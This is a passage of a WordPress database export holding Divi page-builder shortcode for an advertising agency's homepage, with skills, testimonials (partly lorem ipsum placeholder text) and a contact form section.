creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:25:31','2020-08-07 20:25:31','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(618,1,'2020-08-07 20:26:26','2020-08-07 20:26:26','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb 